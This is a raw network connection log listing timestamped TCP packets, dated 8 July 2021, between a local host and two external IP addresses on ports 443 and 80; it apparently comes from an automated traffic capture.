Jul 8, 2021 15:45:13.790597916 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790636063 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790637970 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790673018 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790683985 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790710926 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790720940 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790741920 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790756941 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790776014 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790800095 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790815115 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790826082 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790834904 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790863037 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790863991 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790888071 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790908098 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790914059 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790939093 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.790966034 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.790971041 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791003942 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791021109 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791050911 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791071892 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791084051 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791131973 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791148901 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791177988 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791202068 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791214943 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791251898 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791254997 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791285038 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791290045 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791310072 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791347980 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791353941 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791394949 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791397095 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791444063 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791455984 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791476965 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791505098 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791522026 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791562080 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.791562080 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791587114 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.791631937 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.913898945 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914160013 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914258003 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.914266109 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914319038 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914319038 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.914371967 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914426088 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914472103 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.914474964 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914529085 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914557934 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.914566994 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.914587021 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914652109 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914658070 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.914707899 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914710045 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.914757967 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.914783955 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.914865971 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.923798084 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.923856020 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.923918009 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.923954010 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.923983097 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924076080 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924105883 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924159050 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924197912 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924259901 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924295902 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924297094 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924331903 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924349070 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924365997 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924400091 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924432993 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924443007 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924479961 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924513102 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924514055 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924547911 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924581051 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924582005 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924614906 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924649000 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924684048 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924694061 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924726963 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924765110 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924782038 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924798012 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924832106 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924863100 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924865007 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924897909 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.924926043 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.924931049 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.925019979 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.925031900 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:14.047252893 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:14.047311068 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:14.047348976 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:14.047384977 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:14.047724962 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:14.047775030 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:14.061712980 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:14.179986954 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:14.180131912 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:14.193921089 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:46:32.909785032 CEST	49752	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:46:33.045824051 CEST	443	49752	162.241.253.78	192.168.2.3
Jul 8, 2021 15:46:33.046032906 CEST	49752	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:46:33.049217939 CEST	49752	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:46:33.185451984 CEST	443	49752	162.241.253.78	192.168.2.3
Jul 8, 2021 15:46:33.199518919 CEST	443	49752	162.241.253.78	192.168.2.3
Jul 8, 2021 15:46:33.199678898 CEST	49752	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:46:33.200623035 CEST	49752	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:46:33.205681086 CEST	49752	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:46:33.341695070 CEST	443	49752	162.241.253.78	192.168.2.3
Jul 8, 2021 15:46:33.347779036 CEST	443	49752	162.241.253.78	192.168.2.3
Jul 8, 2021 15:46:33.348306894 CEST	443	49752	162.241.253.78	192.168.2.3
Jul 8, 2021 15:46:33.348617077 CEST	49752	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:46:33.348640919 CEST	49752	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:46:47.524405003 CEST	49754	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:47.524579048 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:47.692333937 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:47.692378044 CEST	80	49754	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:47.692429066 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:47.692461967 CEST	49754	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:47.694397926 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:47.904647112 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.628479958 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.628520012 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.628554106 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.628583908 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.628616095 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.628619909 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.628652096 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.628725052 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.630412102 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.630470991 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.630505085 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.630534887 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.630564928 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.630630016 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.796827078 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.798039913 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.803056955 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803086996 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803138971 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803160906 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803174973 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.803190947 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803190947 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.803215981 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.803217888 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803241014 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803256035 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.803275108 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803291082 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.803303003 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803316116 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.803325891 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.803344011 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.803365946 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.804881096 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.804912090 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.804953098 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.804956913 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.804970980 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.804991961 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.805114985 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.805144072 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.805171967 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.805185080 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.805223942 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.965497017 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.968061924 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.977744102 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.977793932 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.977822065 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.977848053 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.977871895 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.977896929 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.977926016 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.977935076 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.977941036 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.978003979 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.978008986 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.978014946 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.978068113 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.978118896 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.979667902 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.979705095 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.979737043 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.979754925 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.979789019 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.979882002 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.979939938 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.979943991 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.979990005 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.980004072 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.980038881 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.980089903 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:48.980093956 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:48.980140924 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.136852980 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.140223980 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.154155016 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154191017 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154223919 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154442072 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154474020 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154484034 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.154504061 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154537916 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154552937 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.154567003 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154599905 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154616117 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.154630899 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154661894 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154689074 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.154691935 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154722929 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154746056 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.154755116 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154786110 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154819012 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154820919 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.154850960 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.154890060 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.154952049 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.309911013 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.310112000 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.327038050 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.327161074 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.327450037 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.327476025 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.327501059 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.327527046 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.327554941 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.327565908 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.327570915 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.327589989 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.327594995 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.327625036 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.327636003 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.327649117 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.327673912 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.328627110 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.328655958 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.328679085 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.328699112 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.328706026 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.328712940 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.328728914 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.328732967 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.328751087 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.328758955 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.328783035 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.328819036 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.329124928 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.329153061 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.329183102 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.329195023 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.329194069 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.329216957 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.329272032 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.477511883 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.477746010 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.501575947 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.501645088 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.501662970 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.501833916 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.501849890 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.502049923 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.502062082 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.502109051 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.502140045 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.502142906 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.502178907 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.502206087 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.502285004 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.503124952 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.503246069 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.503262997 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.503309011 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.503340960 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.503353119 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.503391027 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.503408909 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.503438950 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.503479004 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.503503084 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.503509998 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.503521919 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.503536940 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.503655910 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.547334909 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.547360897 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.547477961 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.550085068 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.645672083 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.645802975 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.676090956 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.676162004 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.676211119 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.676227093 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.676249027 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.676253080 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.676260948 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.676301956 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.676318884 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.676361084 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.676479101 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.676526070 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.676563978 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.676604033 CEST	49755	80	192.168.2.3	165.232.183.49
Jul 8, 2021 15:46:49.676631927 CEST	80	49755	165.232.183.49	192.168.2.3
Jul 8, 2021 15:46:49.676672935 CEST	49755	80	192.168.2.3	165.232.183.49
